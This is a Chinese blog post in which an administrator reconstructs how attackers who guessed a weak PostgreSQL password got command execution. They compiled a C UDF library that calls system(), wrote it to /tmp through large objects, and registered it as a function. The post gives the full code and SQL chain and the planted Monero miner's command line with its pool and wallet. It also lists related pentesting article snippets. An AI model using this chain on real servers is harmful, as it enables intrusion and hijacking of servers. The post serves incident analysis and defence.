postgresql 弱口令 UDF 攻击

最新推荐文章于 2024-08-11 13:54:15 发布
最新推荐文章于 2024-08-11 13:54:15 发布
阅读量2.3k 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laiyangwen1120/article/details/72185814
版权

1.首先通过端口扫描到弱口令 postgresql 账号密码

2.UDF  自定义函数,本地首先编译制作 so 文件,并上传到服务器

参考:https://www.postgresql.org/docs/9.5/static/xfunc-c.html



 gcc cmd2.c -I`pg_config --includedir-server` -fPIC -shared -o cmd.so



cmd2.c:


#include "stdlib.h"
#include "postgres.h"
#include <string.h>
#include "utils/geo_decls.h"


#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


/* by value */
int exec(int arg){
  system("ls /root -al> /tmp/result");
  return arg;
}
int
add_one(int arg)
{
    return arg + 1;
}


/* by reference, fixed length */


float8 *
add_one_float8(float8 *arg)
{
    float8    *result = (float8 *) palloc(sizeof(float8));


    *result = *arg + 1.0;


    return result;
}


Point *
makepoint(Point *pointx, Point *pointy)
{
    Point     *new_point = (Point *) palloc(sizeof(Point));


    new_point->x = pointx->x;
    new_point->y = pointy->y;


    return new_point;
}


/* by reference, variable length */


text *
copytext(text *t)
{
    /*
     * VARSIZE is the total size of the struct in bytes.
     */
    text *new_t = (text *) palloc(VARSIZE(t));
    SET_VARSIZE(new_t, VARSIZE(t));
    /*
     * VARDATA is a pointer to the data region of the struct.
     */
    memcpy((void *) VARDATA(new_t), /* destination */
           (void *) VARDATA(t),     /* source */
           VARSIZE(t) - VARHDRSZ);  /* how many bytes */
    return new_t;
}


text *
concat_text(text *arg1, text *arg2)
{
    int32 new_text_size = VARSIZE(arg1) + VARSIZE(arg2) - VARHDRSZ;
    text *new_text = (text *) palloc(new_text_size);


    SET_VARSIZE(new_text, new_text_size);
    memcpy(VARDATA(new_text), VARDATA(arg1), VARSIZE(arg1) - VARHDRSZ);
    memcpy(VARDATA(new_text) + (VARSIZE(arg1) - VARHDRSZ),
           VARDATA(arg2), VARSIZE(arg2) - VARHDRSZ);
    return new_text;
}


java工具: 将cmd.so 二进制文件做成16进制字符串,每行<=2kB

public static String byteToArray(byte[] data){  
   String result="";  
   for (int i = 0; i < data.length; i++) {  
   
       result+=Integer.toHexString((data[i] & 0xFF) | 0x100).toUpperCase().substring(1, 3);
       if((i+1)%2048==0){
    result+="\r\n";
    }
   }  
   return result;  
}  
public static void main(String[] args) throws Exception {
byte[] data=FileUtils.readFileToByteArray(new File("C:\\Users\\martin\\Downloads\\package\\libtest.so"));

String result=byteToArray(data);
System.out.println(result);
}



通过sql命令,将cmd.so 导出到 /tmp 目录下

select lo_creat(-1);
delete from pg_largeobject where loid=390334


select * from pg_largeobject where loid=390334


insert into pg_largeobject (loid,pageno,data) values(390334,0,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,1,decode(''FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,2,decode('FFXXXXXXXXXXXXX....','hex'))
;
insert into pg_largeobject (loid,pageno,data) values(390334,3,decode(''FFXXXXXXXXXXXXX....','hex'))
;


SELECT lo_export(390334, '/tmp/cmd.so');   //导出 到 /tmp 目录


创建函数:

CREATE or replace FUNCTION exec(integer) RETURNS integer
     AS '/tmp/cmd.so', 'exec'
     LANGUAGE C STRICT;


执行自定义函数cmd.c的exec方法:
select exec('1')


可以在方法中执行启动进程等,postgres我们公司2台阿里云服务器被人用这种方式 放了挖矿程序导致cpu占用率100%,研究了一天搞清楚了原理,解决方法将postgresql密码修改复杂


附:

黑客启动的挖矿程序执行进程:

/tmp/iftghlv -c x -M 
stratum+tcp://49rR8E9A3CZN2jdNpJK4NMLYKCM9TLbSEAB4m9FxLgXZC4pvz6mWfxK6NRHv9Y3C3Xa9nqRLjUUHfU7werrSne1DP3Ufgw2:x@xmr.crypto-pool.fr:3333/xmr







帅的被人砍xxx
关注
专栏目录
超级弱口令检查工具
04-10
Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。工具采用C#开发,需要安装.NET Framework 4.0,工具目前支持SSH、RDP、MySQL、SQLServer、Oracle、FTP、MongoDB、Memcached、PostgreSQL、Telnet、SMTP、SMTP_SSL、POP3、POP3_SSL、IMAP、IMAP_SSL、SVN、VNC、Redis等服务的弱口令检查工作。
PostgreSQL弱口令到RCE(CVE-2019-9193)
网络安全。
01-29 3102
0x01 简介 PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 0x02 影响版本 postgresql 9.3-11 0x03 漏洞复现 1、使用“超级弱口令”爆破处postgresql数据库账号密码。 2、使用“Navicat Premium”连接postgres...
Postgresql数据库密码忘记的解决方法
最新发布
qq_51431069的博客
08-11 521
PostgreSQL数据库的密码忘记时,可以通过一系列详细的步骤来重置密码。以下是一个特别详细的解决方案,适用于大多数情况,包括Windows和Linux系统。
攻防演练作为红方:现在有一条postgresql,密码是弱密码,现在有什么办法能渗透进去,获取服务器的权限
keyboard专栏
04-28 339
在进行攻防演练中作为红方(攻击者),你的目标是尝试通过各种手段测试系统的安全性。如果你已知 PostgreSQL 使用了弱密码,这就为潜在的入侵提供了一个起点。
PostgreSQL 弱口令漏洞风险
weixin_35757531的博客
12-19 826
PostgreSQL 是一种开源的关系数据库管理系统,它可以运行在各种操作系统平台上。如果 PostgreSQL 数据库的用户使用了弱口令,那么这个数据库就很容易被攻击者攻破。弱口令漏洞会导致攻击者可以通过猜测或使用字典攻击来破解用户的密码,从而获取数据库的访问权限。这样,攻击者就可以篡改、删除或泄露数据库中的数据,甚至可以控制数据库服务器。因此,使用强密码,并定期更换密码,是避免弱口令漏洞风险的...
PostgreSQL UDF妙用 - mybatis等框架,不支持的语法都可以通过UDF来实现
weixin_34345753的博客
12-14 1175
标签 PostgreSQL , UDF , 框架支持 , Django , mybatis , ibatis 背景 PostgreSQL 的功能非常的强大,以至于一些框架可能无法完全发挥出PG的功能。 不过现在活跃的框架对PG的支持越来越好了,例如Django,就有专门针对PG的模块,可以使用PG的JSON,索引接口等功能。 https://docs...
PostgreSQL-UDF用户自定义函数-扩展插件
m0_46182627的博客
08-17 1289
【代码】PostgreSQL-UDF用户自定义函数-扩展插件。
PostgreSQL use UDF combine NoSQL DB's Computing Power
postgrechina的博客
10-14 908
PostgreSQL数据库如何利用NoSQL数据库的强大计算能力或某些特性呢? 这个问题实际上是因为一种数据库不可能做到适合任何场景,一个企业的不同业务类型可能使用的数据产品也千差万别。昨天和一位朋友聊到一个应用场景,他们有部分数据是存储在aerospike的,在aerospike中做BIT运算是很快的,但是当需要多个条件的组合时(多级索引),可能就不是那么适合了。 这个时候Postg
postgresql 弱口令检测
xmas
05-10 1933
import socket import binascii import hashlib def make_response(buf,username,password,salt): pu=hashlib.md5(password+username).hexdigest() buf=hashlib.md5(pu+salt).hexdigest() return 'md5'
PostgreSQL UDF实现tsvector(全文检索), array(数组)多值字段与scalar(单值字段)类型的整合索引(类分区索引) - 单值与多值类型复合查询性能提速100倍+ 案例 (...
weixin_33700350的博客
02-28 663
标签 PostgreSQL , 单值列 , 多值列 , GIN倒排索引 , 多值列变异 , 分区索引 , 分区表 , 变异索引 背景 在应用程序中,特别是使用PostgreSQL多值列(数组、全文检索、JSON)类型的业务中,除了多值列有查询需求,单值列也有查询需求。 那么当两种查询并行存在时,数据库会根据COST选择单列或多列组合索引。但是性能并不...
PostgreSQL渗透测试总结
爱上卿的博客
01-24 2391
一、前言 PostgreSQL是一个开源数据库,主要部署于Linux操作系统中。然而,PostgreSQL的兼容性非常好,可以兼容多个操作系统,也能在Windows及MacOS操作系统上运行。如果PostgreSQL数据库没有被正确配置,并且攻击者已经事先获取了凭证信息,那么他们就可以实施各类攻击行为,比如读写系统文件以及执行任意代码等。 来演示的目标系统是Metasploitable 2,因...
postgresql进行getshell
m0_55772907的博客
11-22 1680
getshell
Windows提权--小迪权限提升--烂土豆--DLL劫持--udf提权
z2560088的博客
02-13 4353
针对环境 windows有两种环境,一种是web网站拿到的webshell环境,一般是低权限的用户,(jsp除外,拿到webshell就是system权限)另一种是本地的环境,可能是服务器为管理某项服务创建的低权限用户。不同环境下的操作会有所不同。 提权方法 1.win溢出漏洞(如何判断类型和利用) 信息收集-补丁筛选-利用 MSF 或特定 EXP-执行-西瓜到手 Vulmap,Wes,WindowsVulnScan 对比,exp 在哪里获取? 利用wes进行补丁筛选 2.数据库提权 ...
常见的端口渗透笔录
里卡多·伊泽克森·多斯·桑托斯·达的博客
03-24 1244
常见的端口渗透笔录 这个不是我写的,朋友圈看到的
端口渗透总结
Coisini的博客
06-13 1323
x00 背景 在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生; 首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e 这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我 再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平...
PostgreSQL Server Programming之UDF(自定义函数)
weixin_34234823的博客
05-08 1353
2019独角兽企业重金招聘Python工程师标准>>> ...
对于PostgreSQL弱口令植入木马试验
weixin_34252686的博客
12-04 388
2019独角兽企业重金招聘Python工程师标准>>> ...
postgresql安全(远程代码执行)
errorr0
07-13 959
postgresql 提权
PostgresSQL弱密码导致命令执行
tangshuangsss的专栏
01-09 3130
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值